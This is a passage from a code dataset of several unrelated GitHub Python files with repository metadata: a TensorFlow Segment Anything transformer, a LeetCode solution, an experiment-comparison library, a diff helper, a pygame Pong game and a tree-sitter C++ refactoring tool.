tf\n\nfrom tfimm.layers import 
norm_layer_factory\n\nfrom .common import MLPBlock\n\n\nclass TwoWayTransformer(tf.keras.Model):\n def __init__(\n self,\n embed_dim: int,\n nb_blocks: int,\n nb_heads: int,\n mlp_dim: int,\n attention_downsample_rate: int,\n act_layer: str,\n **kwargs,\n ):\n super().__init__(**kwargs)\n self.embed_dim = embed_dim\n self.nb_blocks = nb_blocks\n self.nb_heads = nb_heads\n self.mlp_dim = mlp_dim\n self.attention_downsample_rate = attention_downsample_rate\n self.act_layer = act_layer\n\n norm_layer = norm_layer_factory(\"layer_norm\")\n\n self.blocks = [\n TwoWayAttentionBlock(\n embed_dim=self.embed_dim,\n nb_heads=self.nb_heads,\n mlp_dim=self.mlp_dim,\n attention_downsample_rate=self.attention_downsample_rate,\n skip_first_layer_pe=j == 0,\n act_layer=self.act_layer,\n name=f\"layers/{j}\",\n )\n for j in range(self.nb_blocks)\n ]\n self.final_attn_token_to_image = DownsampleAttention(\n embed_dim=self.embed_dim,\n nb_heads=self.nb_heads,\n downsample_rate=self.attention_downsample_rate,\n name=\"final_attn_token_to_image\",\n )\n self.norm_final_attn = norm_layer(name=\"norm_final_attn\")\n\n def call(self, inputs, training=False):\n \"\"\"\n Args:\n inputs: Dictionary with the following entries.\n point_embeddings: Point embedding, should have shape (B, N, embed_dim)\n for any N.\n image_embeddings: Image to attend to. Should have the shape\n (B, H, W, embed_dim) for any (H, W).\n image_pe: Positional encoding to add to the image. Must have the same\n shape as image_embedding.\n training: Training or inference mode?\n\n Returns:\n The processed point_embedding, same shape as input.\n The processed image_embedding, same shape as input. Note that this differs\n from PyTorch, where the output has shape (B, H*W, embed_dim).\n \"\"\"\n image_embeddings = inputs[\"image_embeddings\"]\n image_pe = inputs[\"image_pe\"]\n point_embeddings = inputs[\"point_embeddings\"]\n b, h, w, c = tf.unstack(tf.shape(image_embeddings))\n\n image_embedding = tf.reshape(image_embeddings, (b, -1, c)) # (B, H*W, C)\n image_pe = tf.reshape(image_pe, (b, -1, c)) # (B, H*W, C)\n\n # Prepare queries\n queries = point_embeddings\n keys = image_embedding\n\n # Apply transformer blocks\n for block in self.blocks:\n queries, keys = block(\n {\"q\": queries, \"k\": keys, \"q_pe\": point_embeddings, \"k_pe\": image_pe},\n training=training,\n )\n\n # Apply final attention layer from the points to the image\n attn = self.final_attn_token_to_image(\n {\"q\": queries + point_embeddings, \"k\": keys + image_pe, \"v\": keys},\n training=training,\n )\n queries = queries + attn\n queries = self.norm_final_attn(queries, training=training)\n\n # Reshape back to (B, H, W, C)\n keys = tf.reshape(keys, (b, h, w, c))\n\n return queries, keys\n\n\nclass TwoWayAttentionBlock(tf.keras.layers.Layer):\n def __init__(\n self,\n embed_dim: int,\n nb_heads: int,\n mlp_dim: int,\n attention_downsample_rate: int,\n skip_first_layer_pe: bool,\n act_layer: str,\n **kwargs,\n ):\n \"\"\"\n A transformer block with four layers:\n (1) self-attention of sparse inputs,\n (2) cross attention of sparse inputs to dense inputs,\n (3) mlp block on sparse inputs, and\n (4) cross attention of dense inputs to sparse inputs.\n\n Args:\n embed_dim: the channel dimension of the embeddings\n num_heads: the number of heads in the attention layers\n mlp_dim: the hidden dimension of the mlp block\n skip_first_layer_pe: skip the PE on the first layer\n act_layer: the activation of the mlp block\n \"\"\"\n super().__init__(**kwargs)\n self.embed_dim = embed_dim\n 
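# Inferred from DownsampleAttention below (not stated here): attention_downsample_rate shrinks the q/k/v projections of the cross-attention layers to embed_dim // attention_downsample_rate channels, which cheapens the attention matmuls.\n        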
self.nb_heads = nb_heads\n self.mlp_dim = mlp_dim\n self.attention_downsample_rate = attention_downsample_rate\n self.skip_first_layer_pe = skip_first_layer_pe\n self.act_layer = act_layer\n\n norm_layer = norm_layer_factory(\"layer_norm\")\n\n self.self_attn = DownsampleAttention(\n embed_dim=embed_dim, nb_heads=nb_heads, downsample_rate=1, name=\"self_attn\"\n )\n self.norm1 = norm_layer(name=\"norm1\")\n\n self.cross_attn_token_to_image = DownsampleAttention(\n embed_dim=embed_dim,\n nb_heads=nb_heads,\n downsample_rate=attention_downsample_rate,\n name=\"cross_attn_token_to_image\",\n )\n self.norm2 = norm_layer(name=\"norm2\")\n\n self.mlp = MLPBlock(\n hidden_dim=self.mlp_dim,\n embed_dim=self.embed_dim,\n act_layer=self.act_layer,\n drop_rate=0.0,\n name=\"mlp\",\n )\n self.norm3 = norm_layer(name=\"norm3\")\n\n self.cross_attn_image_to_token = DownsampleAttention(\n embed_dim=embed_dim,\n nb_heads=nb_heads,\n downsample_rate=attention_downsample_rate,\n name=\"cross_attn_image_to_token\",\n )\n self.norm4 = norm_layer(name=\"norm4\")\n\n def call(self, inputs, training=False):\n q, k, q_pe, k_pe = inputs[\"q\"], inputs[\"k\"], inputs[\"q_pe\"], inputs[\"k_pe\"]\n\n # Self-attention block\n if self.skip_first_layer_pe:\n q = self.self_attn({\"q\": q, \"k\": q, \"v\": q}, training=training)\n else:\n attn = self.self_attn({\"q\": q + q_pe, \"k\": q + q_pe, \"v\": q})\n q = q + attn\n q = self.norm1(q, training=training)\n\n # Cross-attention block, tokens attending to image embedding\n attn = self.cross_attn_token_to_image(\n {\"q\": q + q_pe, \"k\": k + k_pe, \"v\": k}, training=training\n )\n q = q + attn\n q = self.norm2(q, training=training)\n\n # MLP block\n mlp = self.mlp(q, training=training)\n q = q + mlp\n q = self.norm3(q, training=training)\n\n # Cross-attention block, image embeddings attending to tokens\n attn = self.cross_attn_image_to_token(\n {\"q\": k + k_pe, \"k\": q + q_pe, \"v\": q}, training=training\n )\n k = k + attn\n k = self.norm4(k, training=training)\n\n return q, k\n\n\nclass DownsampleAttention(tf.keras.layers.Layer):\n \"\"\"\n An attention layer that allows for downscaling the size of the embedding after\n projection to queries, keys, and values.\n \"\"\"\n\n def __init__(\n self,\n embed_dim: int,\n nb_heads: int,\n downsample_rate: int,\n **kwargs,\n ):\n super().__init__(**kwargs)\n self.embed_dim = embed_dim\n self.nb_heads = nb_heads\n self.downsample_rate = downsample_rate\n\n internal_dim = self.embed_dim // self.downsample_rate\n self.q_proj = tf.keras.layers.Dense(internal_dim, use_bias=True, name=\"q_proj\")\n self.k_proj = tf.keras.layers.Dense(internal_dim, use_bias=True, name=\"k_proj\")\n self.v_proj = tf.keras.layers.Dense(internal_dim, use_bias=True, name=\"v_proj\")\n self.out_proj = tf.keras.layers.Dense(\n units=self.embed_dim, use_bias=True, name=\"out_proj\"\n )\n\n def _separate_heads(self, x: tf.Tensor):\n b, m, c = tf.shape(x)[0], tf.shape(x)[1], tf.shape(x)[2] # (B, M, C)\n x = tf.reshape(x, (b, m, self.nb_heads, c // self.nb_heads)) # (B, M, Hd, C/Hd)\n x = tf.transpose(x, (0, 2, 1, 3)) # (B, Hd, M, C/Hd)\n return x\n\n def _recombine_heads(self, x: tf.Tensor):\n # Shape of x is (B, Hd, M, C/Hd)\n batch_size, _, seq_length, _ = tf.unstack(tf.shape(x))\n x = tf.transpose(x, (0, 2, 1, 3)) # (B, M, Hd, C/Hd)\n x = tf.reshape(x, (batch_size, seq_length, -1)) # (B, M, C)\n return x\n\n def call(self, inputs):\n q, k, v = inputs[\"q\"], inputs[\"k\"], inputs[\"v\"]\n\n # Input projections\n q = self.q_proj(q)\n k = self.k_proj(k)\n 
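# At the call sites above, q comes from the tokens and k/v from the image features, so their sequence lengths may differ; only the channel width (embed_dim // downsample_rate after projection) must match.\n        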
v = self.v_proj(v)\n\n        # Separate into heads\n        q = self._separate_heads(q)\n        k = self._separate_heads(k)\n        v = self._separate_heads(v)\n\n        # Attention\n        d = tf.shape(q)[-1]  # D=C/Hd\n        attn = tf.matmul(q, k, transpose_b=True)  # (B, Hd, M, M)\n        attn = attn / tf.sqrt(tf.cast(d, tf.float32))\n        attn = tf.nn.softmax(attn, axis=-1)  # (B, Hd, M, M)\n\n        # Get output\n        x = tf.matmul(attn, v)  # (B, Hd, M, C/Hd)\n        x = self._recombine_heads(x)  # (B, M, C)\n        x = self.out_proj(x)\n\n        return x\n","repo_name":"martinsbruveris/tensorflow-image-models","sub_path":"tfimm/architectures/segment_anything/transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":9031,"program_lang":"python","lang":"en","doc_type":"code","stars":270,"dataset":"github-code","pt":"40"} +{"seq_id":"31347878194","text":"''' q_3 Longest Substring Without Repeating Characters\nGiven a string, find the length of the longest substring that contains no repeated characters.\n\nExample 1:\n\nInput: \"abcabcbb\"\nOutput: 3\nExplanation: The longest substring without repeating characters is \"abc\", so its length is 3.\nExample 2:\n\nInput: \"bbbbb\"\nOutput: 1\nExplanation: The longest substring without repeating characters is \"b\", so its length is 1.\nExample 3:\n\nInput: \"pwwkew\"\nOutput: 3\nExplanation: The longest substring without repeating characters is \"wke\", so its length is 3.\n  Note that the answer must be the length of a substring; \"pwke\" is a subsequence, not a substring.\n'''\nclass Solution:\n    def lengthOfLongestSubstring(self, s):\n        if not s:\n            return 0\n        cur_len = 0\n        max_len = 0\n        left = 0\n        alpha = set()\n        for letter in s:\n            cur_len += 1\n            if letter not in alpha:\n                alpha.add(letter)\n            else:\n                while letter in alpha:\n                    alpha.remove(s[left])\n                    left += 1\n                    cur_len -= 1\n                alpha.add(letter)\n            if cur_len > max_len:\n                max_len = cur_len\n        return max_len\n\n\nif __name__ == '__main__':\n    s = Solution()\n    print(s.lengthOfLongestSubstring('dvdef'))\n    # 'defabcdfe'\n","repo_name":"NoteXYX/leetcode","sub_path":"q_3.py","file_name":"q_3.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12851494683","text":"from random import random, sample\nfrom functools import wraps\nfrom logging import getLogger\n\nfrom .settings import settings, ConfigurationError\nfrom .utils import Timer\n\nlogger = getLogger(__name__)\n\n\nclass Experiment(object):\n    \"\"\"\n    Establish a function as the basis for an experiment.\n\n    >>> @Experiment(new_unverified_fn)\n    ... def old_known_fn():\n    ...     
...\n    \"\"\"\n    _control = None\n\n    def __init__(self, behaviors=(), control=None, name=None, **options):\n        self.behaviors = set([behaviors] if callable(behaviors) else behaviors)\n        # Control function can also be specified as a decorator via __call__\n        self.control = control\n        if control is not None:\n            self.behaviors.add(self.control)\n\n        self._name = name\n        self._compare = options.pop('compare', None)\n        self.context = options.pop('context', {})\n\n        # Settings\n        self.chance = options.get('chance', settings.chance)\n        self.raise_on_mismatches = options.get(\n            'raise_on_mismatches', settings.raise_on_mismatches)\n\n    @property\n    def name(self):\n        return self._name or (\n            self.control.__name__ if self.control else self.__name__)\n\n    @property\n    def control(self):\n        return self._control\n\n    @control.setter\n    def control(self, value):\n        if self._control is not None:\n            raise ConfigurationError(\n                \"The control function should only be set once.\"\n            )\n        self._control = value\n\n    def __call__(self, control):\n        \"\"\"\n        Wrap a control function.\n        \"\"\"\n        self.control = control\n        self.behaviors.add(control)\n\n        @wraps(control)\n        def wrapper(*args, **kwargs):\n            return self.run(*args, **kwargs)\n\n        wrapper.experiment = self\n        return wrapper\n\n    @property\n    def should_run_experiment(self):\n        return len(self.behaviors) > 1 and self.chance > random()\n\n    def run(self, *args, **kwargs):\n        # Always run the control behavior, but allow other behaviors to run\n        # intermittently.\n        if self.should_run_experiment:\n            # random.sample needs a sequence, so materialize the behavior set\n            behaviors = sample(list(self.behaviors), len(self.behaviors))\n        else:\n            behaviors = [self.control]\n\n        result = Result(self, behaviors, args, kwargs)\n        try:\n            for ix, behavior in enumerate(behaviors):\n                result.timed_run(behavior, *args, **kwargs)\n        finally:\n            # If control raised an exception, some of the other behaviors may\n            # not have run yet. 
Keep going.\n            for behavior in behaviors[ix+1:]:\n                result.timed_run(behavior, *args, **kwargs)\n\n        self.publish(result)\n\n        # Mismatch exceptions should supersede a control's exception\n        should_raise = (\n            self.raise_on_mismatches and\n            not result.observations_are_equivalent\n        )\n        if should_raise:\n            raise ObservationMismatchError(\n                \"Observations are not equivalent\", result)\n\n        # If control didn't throw an exception, return its value.\n        return result.control_observation.value\n\n    def compare(self, control_result, experimental_result):\n        \"\"\"\n        Return true if the results match.\n        \"\"\"\n        _compare = self._compare or (lambda x, y: x == y)\n        return (\n            # Mismatch if only one of the results returned an error, or if\n            # different types of errors were returned.\n            type(control_result.error) is type(experimental_result.error) and\n            _compare(control_result.value, experimental_result.value)\n        )\n\n    def publish(self, result):\n        if result.observations_are_equivalent:\n            logger.info(u\"Observations for {e.name} match!\".format(e=self))\n        else:\n            logger.error(\n                u\"Observations for {e.name} don't match!\".format(e=self))\n\n\nclass Result(object):\n    \"\"\"\n    A single run of an experiment.\n    \"\"\"\n    def __init__(self, experiment, behaviors, args, kwargs):\n        self.experiment = experiment\n        self.behaviors = behaviors\n        self.observations = []\n        self.args = args\n        self.kwargs = kwargs\n\n    def timed_run(self, behavior, *args, **kwargs):\n        timer = Timer()\n        try:\n            value = behavior(*args, **kwargs)\n            self.observations.append(Observation(value, None, timer.stop()))\n        except Exception as ex:\n            self.observations.append(Observation(None, ex, timer.stop()))\n            if behavior is self.experiment.control:\n                raise\n\n    @property\n    def control_observation(self):\n        for behavior, observation in zip(self.behaviors, self.observations):\n            if behavior is self.experiment.control:\n                return observation\n\n    @property\n    def observations_are_equivalent(self):\n        control_observation = self.control_observation\n        for behavior, observation in zip(self.behaviors, self.observations):\n            is_equivalent = (\n                behavior is self.experiment.control or\n                self.experiment.compare(control_observation, observation))\n            if not is_equivalent:\n                return False\n        return True\n\n\nclass Observation(object):\n    def __init__(self, value, error, duration):\n        self.value = value\n        self.error = error\n        self.duration = duration\n\n\nclass ObservationMismatchError(Exception):\n    pass\n","repo_name":"staticshock/scientist.py","sub_path":"scientist/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":5489,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"40"} +{"seq_id":"7079230887","text":"from data.data_layer import DataLayer\nfrom logging import getLogger\n\nlogger = getLogger('waes')\n\n\ndef compare_files(id, data_layer=''):\n    side = 'left'\n    dl = data_layer if data_layer else DataLayer()\n    try:\n        left = dl.get(id, side)\n        side = 'right'\n        right = dl.get(id, side)\n    except IOError:\n        msg = 'File with id = %s and side = %s is not provided' % (id, side)\n        raise IOError(msg)\n    return compare(left, right)\n\n\ndef compare(left, right):\n    # left length != right length\n    if len(left) != len(right):\n        return {'payload': 'Different length'}\n    # left == right\n    if left == right:\n        return {'payload': 'Equal'}\n    # left and right are different\n    out_data = []\n    diff_counter = 0\n    offset = -1\n    for i in range(len(left)):\n\n        if left[i] == right[i]:\n            if diff_counter != 0:\n                # equal symbols found: reset\n                # diff_counter and offset, and save the diff data\n                out_data.append({'offset': offset, 'length': diff_counter})\n                diff_counter = 0\n                offset = -1\n        else:\n            if offset < 0:\n                # at the first differing symbol, save the beginning position to offset\n                offset = i\n            diff_counter += 1\n\n    if diff_counter > 0:\n        out_data.append({'offset': offset, 'length': diff_counter})\n    return {'payload': out_data}\n","repo_name":"apelsin83/jobinterviews","sub_path":"waes/bl/comparison.py","file_name":"comparison.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11785375058","text":"import pygame\r\nfrom random import randint as R_randint\r\npygame.font.init()\r\n\r\n# Game settings;\r\nFPS = 240\r\nWIDTH, HEIGHT = 600, 500\r\nWIN = pygame.display.set_mode((WIDTH, HEIGHT))\r\nPLAYER_MOVEMENT_VEL = 3\r\nPLAYER_HEIGHT = 70\r\nPLAYER_WIDTH = 12\r\nGAME_BALL_SIZE = 10\r\nGAME_BALL_STATE = {\"x\": (WIDTH//2)-GAME_BALL_SIZE//2, \"y\": (HEIGHT//2)-GAME_BALL_SIZE//2}\r\nGAME_HAS_STARTED = False\r\nGAME_BALL_VELOCITY = 1\r\nGAME_BALL_MOVE_SIDE = \"\"\r\n\r\n# Colors;\r\nRED = (255, 0, 0)\r\nBLACK = (0,0,0)\r\nWHITE = (255,255,255)\r\n\r\n# Players;\r\nPLAYER_ONE = pygame.Rect(10, (HEIGHT//2)-7, PLAYER_WIDTH, PLAYER_HEIGHT)\r\nPLAYER_TWO = pygame.Rect(WIDTH-24, (HEIGHT//2)-7, PLAYER_WIDTH, PLAYER_HEIGHT)\r\nPLAYER_ONE_AIMING = \"right\"\r\nPLAYER_TWO_AIMING = \"left\"\r\n\r\n# App settings;\r\npygame.display.set_caption(\"Pong\")\r\n\r\ndef gameEndsFunc(whoWon):\r\n    comicFont = pygame.font.SysFont('Comic Sans MS', 70)\r\n    WIN.blit(comicFont.render(str(whoWon) + \" wins!\", 1, (RED)), ((WIDTH//2)-220, 200))\r\n    pygame.display.update()\r\n    while True:\r\n        for event in pygame.event.get():\r\n            if event.type == pygame.QUIT:\r\n                pygame.quit()\r\n\r\n    \r\n# The ball moving settings;\r\ndef moveBallF():\r\n    global GAME_BALL_MOVE_SIDE\r\n    # print(GAME_BALL_STATE)\r\n    \r\n    if GAME_BALL_MOVE_SIDE == \"left\":\r\n        GAME_BALL_STATE[\"x\"]-=GAME_BALL_VELOCITY\r\n        if GAME_BALL_STATE[\"x\"] == PLAYER_ONE.x+PLAYER_WIDTH and GAME_BALL_STATE[\"y\"] < PLAYER_ONE.y+PLAYER_HEIGHT and GAME_BALL_STATE[\"y\"] > PLAYER_ONE.y-PLAYER_HEIGHT:\r\n            if PLAYER_ONE_AIMING == \"up\":\r\n                GAME_BALL_MOVE_SIDE = \"upright\"\r\n            else:\r\n                GAME_BALL_MOVE_SIDE = \"downright\"\r\n\r\n    elif GAME_BALL_MOVE_SIDE == \"right\":\r\n        GAME_BALL_STATE[\"x\"]+=GAME_BALL_VELOCITY\r\n        if GAME_BALL_STATE[\"x\"] == PLAYER_TWO.x-PLAYER_WIDTH and GAME_BALL_STATE[\"y\"] < PLAYER_TWO.y+PLAYER_HEIGHT and GAME_BALL_STATE[\"y\"] > PLAYER_TWO.y-PLAYER_HEIGHT:\r\n            if PLAYER_TWO_AIMING == \"up\":\r\n                GAME_BALL_MOVE_SIDE = \"upleft\"\r\n            else:\r\n                GAME_BALL_MOVE_SIDE = \"downleft\"\r\n\r\n    elif GAME_BALL_MOVE_SIDE == \"upleft\":\r\n        GAME_BALL_STATE[\"x\"]-=GAME_BALL_VELOCITY\r\n        GAME_BALL_STATE[\"y\"]-=GAME_BALL_VELOCITY\r\n\r\n        if GAME_BALL_STATE[\"x\"] == PLAYER_ONE.x+PLAYER_WIDTH and GAME_BALL_STATE[\"y\"] < PLAYER_ONE.y+PLAYER_HEIGHT and GAME_BALL_STATE[\"y\"] > PLAYER_ONE.y-PLAYER_HEIGHT:\r\n            if PLAYER_ONE_AIMING == \"up\":\r\n                GAME_BALL_MOVE_SIDE = \"upright\"\r\n            else:\r\n                GAME_BALL_MOVE_SIDE = \"downright\"\r\n\r\n    elif GAME_BALL_MOVE_SIDE == \"upright\":\r\n        GAME_BALL_STATE[\"x\"]+=GAME_BALL_VELOCITY\r\n        GAME_BALL_STATE[\"y\"]-=GAME_BALL_VELOCITY\r\n        if GAME_BALL_STATE[\"x\"] == PLAYER_TWO.x-PLAYER_WIDTH and GAME_BALL_STATE[\"y\"] < PLAYER_TWO.y+PLAYER_HEIGHT and GAME_BALL_STATE[\"y\"] > PLAYER_TWO.y-PLAYER_HEIGHT:\r\n            if PLAYER_TWO_AIMING == \"up\":\r\n                GAME_BALL_MOVE_SIDE = \"upleft\"\r\n            else:\r\n                
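# the right paddle was last moving down (or has not moved yet), so the ball deflects downward\r\n                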
GAME_BALL_MOVE_SIDE = \"downleft\"\r\n\r\n elif GAME_BALL_MOVE_SIDE == \"downleft\":\r\n GAME_BALL_STATE[\"x\"]-=GAME_BALL_VELOCITY\r\n GAME_BALL_STATE[\"y\"]+=GAME_BALL_VELOCITY\r\n if GAME_BALL_STATE[\"x\"] == PLAYER_ONE.x+PLAYER_WIDTH and GAME_BALL_STATE[\"y\"] < PLAYER_ONE.y+PLAYER_HEIGHT and GAME_BALL_STATE[\"y\"] > PLAYER_ONE.y-PLAYER_HEIGHT:\r\n if PLAYER_ONE_AIMING == \"up\":\r\n GAME_BALL_MOVE_SIDE = \"upright\"\r\n else:\r\n GAME_BALL_MOVE_SIDE = \"downright\"\r\n\r\n elif GAME_BALL_MOVE_SIDE == \"downright\":\r\n GAME_BALL_STATE[\"x\"]+=GAME_BALL_VELOCITY\r\n GAME_BALL_STATE[\"y\"]+=GAME_BALL_VELOCITY\r\n if GAME_BALL_STATE[\"x\"] == PLAYER_TWO.x+PLAYER_WIDTH and GAME_BALL_STATE[\"y\"] < PLAYER_TWO.y+PLAYER_HEIGHT and GAME_BALL_STATE[\"y\"] > PLAYER_TWO.y-PLAYER_HEIGHT:\r\n if PLAYER_TWO_AIMING == \"up\":\r\n GAME_BALL_MOVE_SIDE = \"upleft\"\r\n else:\r\n GAME_BALL_MOVE_SIDE = \"downleft\"\r\n\r\n # border colisions;\r\n if GAME_BALL_MOVE_SIDE == \"upleft\" and GAME_BALL_STATE[\"y\"] <= 80+GAME_BALL_SIZE:\r\n GAME_BALL_MOVE_SIDE = \"downleft\"\r\n elif GAME_BALL_MOVE_SIDE == \"upright\" and GAME_BALL_STATE[\"y\"] <= 80+GAME_BALL_SIZE:\r\n GAME_BALL_MOVE_SIDE = \"downright\"\r\n elif GAME_BALL_MOVE_SIDE == \"downleft\" and GAME_BALL_STATE[\"y\"] > HEIGHT:\r\n GAME_BALL_MOVE_SIDE = \"upleft\"\r\n elif GAME_BALL_MOVE_SIDE == \"downright\" and GAME_BALL_STATE[\"y\"] > HEIGHT:\r\n GAME_BALL_MOVE_SIDE = \"upright\"\r\n\r\n # Checking for wins\r\n if GAME_BALL_STATE[\"x\"] > WIDTH:\r\n gameEndsFunc(\"Player-1\")\r\n if GAME_BALL_STATE[\"x\"] < 0:\r\n gameEndsFunc(\"Player-2\")\r\n\r\ndef reRenderScreen(hpText, topBorder, fpsText):\r\n # Refreshing the screen;\r\n WIN.fill(BLACK)\r\n\r\n # The top text and borders;\r\n WIN.blit(hpText, ((WIDTH//2)-50, 0))\r\n pygame.display.set_caption(\"Pong [FPS:\" + str(fpsText) + \"]\")\r\n pygame.draw.rect(WIN, WHITE, topBorder)\r\n # Rendering the players;\r\n pygame.draw.rect(WIN, RED, PLAYER_ONE)\r\n pygame.draw.rect(WIN, RED, PLAYER_TWO)\r\n\r\n # The *ball* for the game;\r\n pygame.draw.circle(WIN, WHITE, (GAME_BALL_STATE[\"x\"], GAME_BALL_STATE[\"y\"]), GAME_BALL_SIZE)\r\n\r\n pygame.display.update()\r\n\r\ndef movePlayerOne(keys_pressed):\r\n global PLAYER_ONE_AIMING\r\n if keys_pressed[pygame.K_w] and PLAYER_ONE.y > 90:\r\n PLAYER_ONE.y -= PLAYER_MOVEMENT_VEL\r\n PLAYER_ONE_AIMING = \"up\"\r\n if keys_pressed[pygame.K_s] and PLAYER_ONE.y < HEIGHT-PLAYER_HEIGHT:\r\n PLAYER_ONE.y += PLAYER_MOVEMENT_VEL\r\n PLAYER_ONE_AIMING = \"down\"\r\n\r\ndef movePlayerTwo(keys_pressed):\r\n global PLAYER_TWO_AIMING\r\n if keys_pressed[pygame.K_UP] and PLAYER_TWO.y > 90:\r\n PLAYER_TWO.y -= PLAYER_MOVEMENT_VEL\r\n PLAYER_TWO_AIMING = \"up\"\r\n if keys_pressed[pygame.K_DOWN] and PLAYER_TWO.y < HEIGHT-PLAYER_HEIGHT:\r\n PLAYER_TWO.y += PLAYER_MOVEMENT_VEL\r\n PLAYER_TWO_AIMING = \"down\"\r\n\r\ndef main():\r\n global GAME_HAS_STARTED, GAME_BALL_MOVE_SIDE\r\n isRunning = True\r\n gameClock = pygame.time.Clock()\r\n while isRunning:\r\n gameClock.tick(FPS)\r\n print(gameClock)\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n\r\n # The pong text;\r\n comicFont = pygame.font.SysFont('Comic Sans MS', 50)\r\n pongText = comicFont.render('Pong', 1, (255, 255, 255))\r\n\r\n # The top border;\r\n topBorder = pygame.Rect(0, 80, WIDTH, 10)\r\n\r\n # Checking for movements;\r\n keys_pressed = pygame.key.get_pressed() # Getting the pressed keys;\r\n # Setting the aiming to right-left now so if the players dont move their 
aiming values are neutral;\r\n movePlayerOne(keys_pressed)\r\n movePlayerTwo(keys_pressed)\r\n\r\n # Checking if game started is false so we can do the ball movement startup now;\r\n if not(GAME_HAS_STARTED):\r\n GAME_HAS_STARTED = True\r\n # Making a simple random-generation to know which side to start the ball to;\r\n if R_randint(0, 1) == 0:\r\n GAME_BALL_MOVE_SIDE = \"left\"\r\n else:\r\n GAME_BALL_MOVE_SIDE = \"right\"\r\n\r\n moveBallF()\r\n\r\n # ReRenderF\r\n reRenderScreen(pongText, topBorder, str(gameClock.get_fps()))\r\n \r\n # Quiting the game\r\n pygame.quit()\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"bosdos12/Pong_myfirstpygame-game","sub_path":"Pong.py","file_name":"Pong.py","file_ext":"py","file_size_in_byte":7465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8176220949","text":"\"\"\"\nThis module is the core of functionality for the library.\n\"\"\"\nfrom typing import Dict, List, Optional, Set, Tuple\n\nfrom tree_sitter import Language, Node, Parser, Tree\n\nfrom remusing_cpp.queries import SymbolQuery, TypeQuery, UsingQuery\nfrom remusing_cpp.symbols import (\n get_default_std_symbols,\n get_default_symb_namespace_map,\n)\nfrom remusing_cpp.ts_model import HashableTreeNode\n\n\nclass RemUsing:\n \"\"\"\n Class to remove `using` declarations and refactor symbol names.\n \"\"\"\n\n def __init__(self, src: bytes, parser: Parser, language: Language):\n \"\"\"\n Initialize the class.\n\n Arguments:\n src: The starting C++ source code\n parser: The C++ tree-sitter parser\n language: The C++ tree-sitter language\n \"\"\"\n self.src = src\n self.parser = parser\n self.language = language\n\n self.types_query = TypeQuery()\n self.symbols_query = SymbolQuery()\n self.using_query = UsingQuery()\n\n self.find_symbols = get_default_std_symbols()\n self.hardcoded_namespace_map = get_default_symb_namespace_map()\n\n self._tree: Optional[Tree] = None\n self._query_str: Optional[str] = None\n self._captures: Optional[List[Tuple[Node, str]]] = None\n self._lookup_captures: Optional[Dict[str, Set[HashableTreeNode]]] = None\n self._unqualified_types: Optional[List[HashableTreeNode]] = None\n self._decl_ns_map: Optional[Dict[str, str]] = None\n\n # API State tracking\n self._did_parse = False\n self._did_query = False\n self._did_process_captures = False\n self._did_fix = False\n\n def parse(self) -> None:\n \"\"\"\n Parse the source code with tree-sitter.\n \"\"\"\n if self._did_parse:\n return\n\n self._tree = self.parser.parse(self.src)\n\n self._did_parse = True\n\n def query(self) -> None:\n \"\"\"\n Run tree-sitter queries on the parsed source code to gather necessary\n information about qualified/unqualified symbols and `using` statements.\n \"\"\"\n if self._did_query:\n return\n else:\n self.parse()\n\n self._query_str = \"\\n\".join(\n [\n self.types_query.build_all_queries(),\n self.symbols_query.build_all_queries(),\n self.using_query.build_all_queries(),\n ]\n )\n query = self.language.query(self._query_str)\n assert self._tree is not None\n self._captures = query.captures(self._tree.root_node)\n\n self._did_query = True\n\n def process_captures(self) -> None:\n \"\"\"\n Process the captured elements that we queried and enable our fixes.\n \"\"\"\n if self._did_process_captures:\n return\n else:\n self.query()\n\n # Collect all captures into a workable representation\n self._lookup_captures = {}\n assert self._captures is not None\n for cap in self._captures:\n cap_node: Node = cap[0]\n 
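# note (added): with the list-based Query.captures API used here, each capture\n            # is a (node, capture_name) tuple, matching the List[Tuple[Node, str]]\n            # annotation on self._captures\n            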
cap_name: str = cap[1]\n if cap_name not in self._lookup_captures:\n self._lookup_captures[cap_name] = {HashableTreeNode(cap_node)}\n else:\n self._lookup_captures[cap_name].add(HashableTreeNode(cap_node))\n\n # Gather unqualified identifiers\n all_types = self._lookup_captures.get(self.types_query.TYPE_ALL_CAPTURE, set())\n self._unqualified_types = sorted(\n set.union(\n # We collected _all_ type_identifiers, so we need to filter out the qualified ones\n all_types.difference(\n set.union(\n self._lookup_captures.get(self.types_query.TYPE_QUAL_CAPTURE, set()),\n self._lookup_captures.get(\n self.types_query.TYPE_QUAL_TEMPLATE_CAPTURE, set()\n ),\n )\n ),\n self._lookup_captures.get(self.symbols_query.SYMBOL_CAPTURE, set()),\n self._lookup_captures.get(self.symbols_query.SYMBOL_FUNC_CAPTURE, set()),\n )\n )\n\n # Map of `using` qualified-type declarations from type to namespace\n self._decl_ns_map = {}\n for decl in self._lookup_captures.get(self.using_query.USING_QUAL_TYPE_CAPTURE, []):\n node = decl.node\n name_node = node.child_by_field_name(\"name\")\n scope_node = node.child_by_field_name(\"scope\")\n name = \"\"\n scope = []\n\n # Handle nested scope namespace\n while scope_node and name_node:\n name = name_node.text.decode(\"utf8\")\n scope.append(scope_node.text.decode(\"utf8\"))\n\n scope_node = name_node.child_by_field_name(\"scope\")\n name_node = name_node.child_by_field_name(\"name\")\n\n scope_text = \"::\".join(scope)\n self._decl_ns_map[name] = scope_text\n\n self._did_process_captures = True\n\n def fix(self) -> bytes:\n \"\"\"\n Fix the source code to remove `using` declarations and add namespace\n qualifications to the unqualified symbols.\n\n Returns:\n The new fixed source code.\n \"\"\"\n self.process_captures()\n\n output = b\"\"\n out_idx = 0\n\n assert self._tree is not None\n assert self._lookup_captures is not None\n assert self._unqualified_types is not None\n assert self._decl_ns_map is not None\n\n # Need to sort so that it makes creating the new text easier in one go\n using_decls = self._lookup_captures.get(self.using_query.USING_DECL_CAPTURE, set())\n using_ns = self._lookup_captures.get(self.using_query.USING_NS_DECL_CAPTURE, set())\n fixups 